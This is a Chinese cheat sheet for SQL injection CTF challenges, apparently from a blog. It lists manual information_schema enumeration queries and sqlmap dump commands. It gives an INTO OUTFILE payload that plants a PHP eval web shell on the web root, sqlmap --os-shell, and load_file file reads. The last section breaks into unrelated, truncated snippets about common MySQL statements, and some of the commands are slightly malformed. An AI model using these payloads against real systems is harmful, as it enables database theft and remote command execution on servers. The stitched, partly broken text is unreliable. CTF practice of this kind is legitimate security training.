一般而言,其實最後sql注入題目有兩種類目的,乙個是key在表中,要徹底搞明白表結構,乙個是key在檔案中要寫shell或者讀取檔案。
一、讀表:
手工:
1.查列名:
select column_name information_schema.columns where table_schema = 『sql_test
』 and table_name = 『flag
』 limit 1,1;#
2.查表名:
select table_name from information_schema.tables where table_schema=』sql_test'
limit 0,1;#
3.查庫名:
select database() limit 0,1;#
sqlmap:
1.sqlmap.py -r a.txt --level 3 -d uinfo --dbs
2.sqlmap.py -r a.txt --level 3 -d uinfo --tables
3.sqlmap.py -r a.txt --level 3 -d uinfo -t users -columns
3.sqlmap.py -r a.txt --level 3 -d uinfo -t users -c remark -dump
二、shell:
1.select寫shell:
select 1,2,3,』<?php eval($_post[cmd]); ?>』 into outfile 『/var/www/html/abc.php』;#
2.sqlmap得到shell:
sqlmap ***x --os-shell
3.select讀檔案:
load_file(』/tmp/360/key』)
三、閉合:
'、%、"、]、)
%是在like查詢的時候會用到。
這裡需要乙個個組合試驗,可以用python寫個指令碼來做字典。如果有時間,今天下午我寫。
四、繞過:
mysql常用語句 MySQL常用語句
create table student id int primary key auto increment comment 學號 name varchar 200 comment 姓名 age int comment 年齡 comment 學生資訊 修改表注釋 alter table studen...
SQL注入常用語句
一 判斷型別 用and判斷其字元型別 and 1 1 正常返回 and 1 2 頁面正常,但是與上個頁面相比,沒有查詢資料 沒對sql輸入做特殊過濾和處理 字元型 上兩條必須是一起判斷的 and 1 1 非正常返回,顯示錯誤。可能性 1.有過濾 2.閉合符不對 3.不是字元型 總 如果是字元型,那麼...
php mysql 常用語句 mysql常用語句
一 修改mysql使用者密碼 mysql h localhost u root p 命令列登入 update user set password password 123456 where user root 二 資料庫操作 show databases 顯示資料庫 create database ...